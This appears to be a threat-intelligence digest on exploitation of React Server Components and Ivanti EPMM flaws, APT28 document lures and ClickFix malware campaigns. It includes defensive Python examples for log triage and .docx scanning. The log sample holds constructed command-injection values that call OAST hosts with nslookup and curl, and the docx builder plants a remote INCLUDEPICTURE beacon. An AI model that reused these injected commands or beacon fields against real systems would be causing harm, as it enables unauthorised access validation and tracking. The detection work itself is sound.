Rapid Post-Disclosure Exploitation of Critical RCE Vulnerabilities
Security teams reported rapid, opportunistic exploitation of newly disclosed unauthenticated remote code execution (RCE) flaws, with attackers moving quickly from scanning to compromise. JPCERT/CC documented active compromise following disclosure of React2Shell in React Server Components (CVE-2025-55182): multiple threat actors exploited the same exposed environment within days, initially dropping coin miners (e.g., XMRig), then deploying further payloads including the HISONIC backdoor, SNOWLIGHT downloader, and CrossC2, and ending with cron-based persistence and website defacement. Separately, GreyNoise telemetry cited by BleepingComputer indicated that exploitation of two critical Ivanti Endpoint Manager Mobile (EPMM) RCEs (CVE-2026-21962, CVE-2026-24061) was heavily concentrated: a single bulletproof-hosted source IP (193[.]24[.]123[.]42, PROSPERO OOO/AS200593) accounted for 83% of observed activity, and OAST-style DNS callbacks, consistent with initial-access validation rather than payload delivery, were widespread.
Several other items in the set were not tied to a single, specific exploitation event. A Help Net Security “week in review” roundup mixed interviews and assorted security items (including a mention of an exploited BeyondTrust RCE) without a cohesive single-incident account; an NCSC-themed weekly highlights post mainly summarized guidance and calls for participation rather than a discrete compromise; a CloudATG “insights” page carried an unrelated, older recap and generic security content; and a Risky Business bulletin covered law-enforcement developments around IcedID operators (including an alleged developer faking his death) rather than vulnerability exploitation activity.
Related Stories

Active Exploitation of Ivanti EPMM Flaws Used to Seed Dormant Backdoors and Validate RCE
Active exploitation is targeting **Ivanti Endpoint Manager Mobile (EPMM)** via two critical vulnerabilities, `CVE-2026-1281` (authentication bypass) and `CVE-2026-1340` (remote code execution), with activity consistent with **initial access broker (IAB)** tradecraft rather than immediate ransomware-style monetization. Reporting indicates attackers are using exploitation to establish footholds and validate access at scale, then disengaging, suggesting the objective is to inventory and package working access for later activation or resale. Reported post-exploitation behavior includes deployment of a **dormant, in-memory Java class loader** backdoor that stays inactive until a specific trigger is received, with an observed web-accessible artifact at `/mifs/403.jsp`. Separately, GreyNoise telemetry attributes **83% of observed Ivanti exploitation** to a single IP hosted on **bulletproof infrastructure** (PROSPERO OOO, `AS200593`) that is missing from widely circulated IOC lists, while several heavily shared “IOCs” appear to be unrelated (e.g., Windscribe VPN exit nodes primarily scanning **Oracle WebLogic** on port `7001`). GreyNoise also observed prevalent “blind” RCE verification using **OAST DNS callbacks** rather than immediate payload deployment, reinforcing the assessment that operators are confirming exploitability and staging follow-on access rather than acting overtly.
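The blind-verification pattern above (an injected command whose only effect is a DNS lookup of an attacker-controlled OAST name) and the source-concentration figure can both be checked against a web server's own access log. The Python below is an added example, not GreyNoise's, Ivanti's or JPCERT/CC's code: it percent-decodes each request line, flags hostnames under well-known OAST provider suffixes (a non-exhaustive list, and an assumption of this example), and reports what share of requests the busiest source accounts for. The log lines, the `/mifs/example` request path and the IP addresses are constructed; `/mifs/403.jsp` is the artifact named in the reporting.

```python
"""Added example: triage of a web server access log for blind RCE
verification via OAST DNS callbacks and for source concentration.
Not GreyNoise's or Ivanti's code; log lines, paths and IPs are constructed."""
import re
from collections import Counter
from urllib.parse import unquote

# Suffixes of well-known out-of-band application security testing (OAST)
# services (interactsh, Burp Collaborator, dnslog). Non-exhaustive; assumption.
OAST_SUFFIXES = (
    "oast.fun", "oast.live", "oast.me", "oast.online", "oast.pro", "oast.site",
    "interact.sh", "oastify.com", "burpcollaborator.net", "dnslog.cn",
)

# Combined Log Format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Hostname-like tokens inside a percent-decoded request line.
HOST_RE = re.compile(r'(?i)\b[a-z0-9][a-z0-9.-]*\.[a-z]{2,}\b')

# Constructed sample: six requests from one source, one from a second, one
# benign. /mifs/example is a hypothetical path; the addresses are RFC 5737
# documentation ranges, not real infrastructure.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Feb/2026:10:00:01 +0000] "POST /mifs/example?cmd=nslookup%20c8k2j9s7.oast.fun HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.7 - - [01/Feb/2026:10:00:03 +0000] "POST /mifs/example?cmd=nslookup%20d91hq2xk.oast.pro HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.7 - - [01/Feb/2026:10:00:05 +0000] "POST /mifs/example?cmd=curl%20http://d91hq2xk.oast.pro/p HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.7 - - [01/Feb/2026:10:00:09 +0000] "POST /mifs/example?cmd=id HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.7 - - [01/Feb/2026:10:00:15 +0000] "GET /mifs/403.jsp HTTP/1.1" 200 0 "-" "curl/8.0"
198.51.100.7 - - [01/Feb/2026:10:00:20 +0000] "POST /mifs/example?cmd=nslookup%20c8k2j9s7.oast.fun HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.9 - - [01/Feb/2026:10:05:00 +0000] "POST /mifs/example?cmd=ping%20-c1%20ab12cd34.oastify.com HTTP/1.1" 200 512 "-" "Go-http-client/1.1"
192.0.2.5 - - [01/Feb/2026:10:06:00 +0000] "GET / HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
"""


def oast_hosts(text):
    """Hostnames in a (URL-encoded) string that belong to a known OAST service."""
    hits = []
    for host in HOST_RE.findall(unquote(text)):
        host = host.lower()
        if any(host == s or host.endswith("." + s) for s in OAST_SUFFIXES):
            hits.append(host)
    return hits


def parse_log(lines):
    """Parse Combined Log Format lines, tagging each with embedded OAST hosts."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # skip malformed/truncated lines
        ev = m.groupdict()
        ev["oast"] = oast_hosts(ev["uri"])
        events.append(ev)
    return events


def source_concentration(events, top_n=1):
    """Fraction (0..1) of events attributable to the top_n busiest sources."""
    counts = Counter(ev["src"] for ev in events)
    total = sum(counts.values())
    if total == 0:
        return 0.0, []
    top = counts.most_common(top_n)
    return sum(c for _, c in top) / total, top


def triage(log_text):
    """Summarize OAST callback indicators and source concentration for a log."""
    events = parse_log(log_text.splitlines())
    callbacks = [ev for ev in events if ev["oast"]]
    share, top = source_concentration(events)
    return {
        "events": len(events),
        "oast_events": len(callbacks),
        "oast_sources": sorted({ev["src"] for ev in callbacks}),
        "oast_hosts": sorted({h for ev in callbacks for h in ev["oast"]}),
        "top_source": top[0][0] if top else None,
        "top_share": round(share, 2),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Against a real log the signal to act on is the combination: a source that both dominates request volume and embeds OAST names in its payloads is validating access, and the per-session OAST identifier is a pivot across other hosts in the estate. Payloads that arrive in a POST body rather than the query string are not in a standard access log; a reverse-proxy or WAF body log is needed for those.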
1 month ago
Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation
The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes **APT28** activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing Office lures that beacon to `webhook[.]site` through an `INCLUDEPICTURE` field and then use macros to run VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, **MuddyWater** (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a **Char** backdoor that uses a **Telegram bot** for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing. Criminal activity and initial-access tradecraft were also covered in distinct stories: a DFIR case study described exploitation of **Apache ActiveMQ** `CVE-2023-46604` for RCE, post-exploitation with Metasploit/Meterpreter, privilege escalation, LSASS access and lateral movement, and final deployment of **LockBit**-branded ransomware over RDP using previously stolen credentials (with indications the payload was built with the leaked builder and that the operators used *Session* for communications). Multiple reports described malware delivery via compromised web assets and social engineering: **GrayCharlie** injecting malicious JavaScript into WordPress sites to push **NetSupport RAT**, **Stealc**, and **SectopRAT** via fake updates and ClickFix-style CAPTCHAs, and a separate **ClickFix** campaign delivering a custom C++ RAT (**MIMICRAT**) through fake Cloudflare verification prompts that trick users into running PowerShell.
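The `INCLUDEPICTURE` beacon in the APT28 lures works because Word stores the field instruction in the document XML and, when the `\d` switch is present, fetches the target on open instead of embedding the image. The following Python is an added example, not code from the APT28 reporting or from any vendor: it opens a `.docx` as the zip it is, extracts field instructions from both simple (`w:fldSimple`) and complex (`w:fldChar`/`w:instrText`) fields across every `word/*.xml` part, and reports any `INCLUDEPICTURE` or `INCLUDETEXT` (treating the latter the same is an assumption) whose target is an HTTP(S) URL or UNC path. The minimal sample document it builds and the `webhook.site` token in it are constructed; nested fields and the RTF `\fldinst` form are out of scope.

```python
"""Added example: scan a .docx for INCLUDEPICTURE/INCLUDETEXT fields that
point at a remote resource. Not from the APT28 reporting or any vendor tool;
the sample document and the webhook.site token are constructed."""
import io
import re
import zipfile
from xml.sax.saxutils import escape, unescape

XML_ENTITIES = {"&quot;": '"', "&apos;": "'"}

# Field instructions that make Word fetch an external resource when the field
# is updated (on open when \d is set, or on render). Only http(s) URLs and UNC
# paths are flagged; local relative paths are deliberately ignored.
FIELD_RE = re.compile(r'(INCLUDEPICTURE|INCLUDETEXT)\s+"?((?:https?://|\\\\)[^"\s<]+)', re.I)
# Simple fields carry the instruction in an attribute ...
SIMPLE_RE = re.compile(r'<w:fldSimple[^>]*\bw:instr="([^"]*)"')
# ... complex fields spread it over instrText runs between fldChar markers.
INSTR_RE = re.compile(r'<w:instrText[^>]*>(.*?)</w:instrText>', re.S)
FLDCHAR_RE = re.compile(r'<w:fldChar[^>]*\bw:fldCharType="(begin|separate|end)"[^>]*>')


def complex_fields(xml_text):
    """Instruction string of each complex field in a WordprocessingML part.
    Nested fields are not handled (assumption: one level suffices for triage)."""
    fields, buf, in_field, pos = [], [], False, 0
    for m in FLDCHAR_RE.finditer(xml_text):
        if in_field:
            buf.extend(INSTR_RE.findall(xml_text[pos:m.start()]))
        if m.group(1) == "begin":
            in_field, buf = True, []
        elif in_field:                  # "separate" or "end" closes the instruction
            fields.append(unescape("".join(buf), XML_ENTITIES))
            in_field = False
        pos = m.end()
    return fields


def scan_docx(data):
    """Return (part, field type, target) for every remote INCLUDE* field in a .docx."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            # body, headers, footers and footnotes all live under word/
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml_text = z.read(name).decode("utf-8", "replace")
            instrs = [unescape(m.group(1), XML_ENTITIES) for m in SIMPLE_RE.finditer(xml_text)]
            instrs += complex_fields(xml_text)
            for instr in instrs:
                for ftype, target in FIELD_RE.findall(instr):
                    findings.append((name, ftype.upper(), target))
    return findings


def build_sample_docx(target):
    """Constructed minimal .docx: one complex INCLUDEPICTURE field pointing at
    target (with the \\d 'fetch on open' switch) plus a benign PAGE field.
    Real files carry more parts; only document.xml matters for this check."""
    doc = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE </w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">"' + escape(target) + '" \\* MERGEFORMAT \\d </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>[image]</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p><w:p><w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'
        '</w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder webhook.site token, not a real beacon URL.
    beacon = "https://webhook.site/00000000-0000-0000-0000-000000000000"
    for finding in scan_docx(build_sample_docx(beacon)):
        print(finding)
```

In triage the target alone is the useful indicator: a unique URL path or token per recipient is how the sender learns who opened the document, so the same check run across a mail queue exposes the lure's per-target identifiers before any macro runs.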
Additional, unrelated threat reporting included a **NuGet** supply-chain attack (typosquatted `NCryptYo` plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “**Promise Bomb**” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.
3 weeks ago
GreyNoise Reports Concentrated Exploitation of React Server Components RCE (CVE-2025-55182)
GreyNoise telemetry indicates that exploitation of **CVE-2025-55182** in **React Server Components** has shifted from broad, opportunistic scanning to concentrated, high-volume campaigns. The flaw is described as **pre-authentication RCE** with a **CVSS 10.0** and can be triggered via a single malicious **HTTP POST** request, making exposed development servers (notably on ports **3000–3002** in addition to 80/443) attractive targets. Between **Jan 26 and Feb 2, 2026**, GreyNoise observed **1,083** unique sources attempting exploitation, but **two IPs accounted for 56%** of observed activity, suggesting industrialized automation rather than ad-hoc testing. Reporting attributes **34%** of sessions to `193.142.147[.]209`, associated with payloads that open **reverse shells** back to the scanning host (including use of port **12323**), indicating intent for interactive access and potential follow-on pivoting. Another **22%** is attributed to `87.121.84[.]24`, linked to **cryptomining** activity (e.g., downloading **XMRig** from staging infrastructure); one cited staging host is `205.185.127[.]97`, associated with attacker-controlled domains (e.g., `mased[.]top`, `mercarios[.]buzz`) and adjacent subnet activity reportedly distributing **Mirai**. Separately, GreyNoise also reported a distinct reconnaissance campaign against **Citrix NetScaler/Gateway** using **tens of thousands of residential proxy IPs** to enumerate login panels and version artifacts (e.g., `/logon/LogonPoint/index.html` and `/epa/scripts/win/nsepa_setup.exe`), which appears to be pre-exploitation mapping and is not directly tied to the React CVE activity.
1 month ago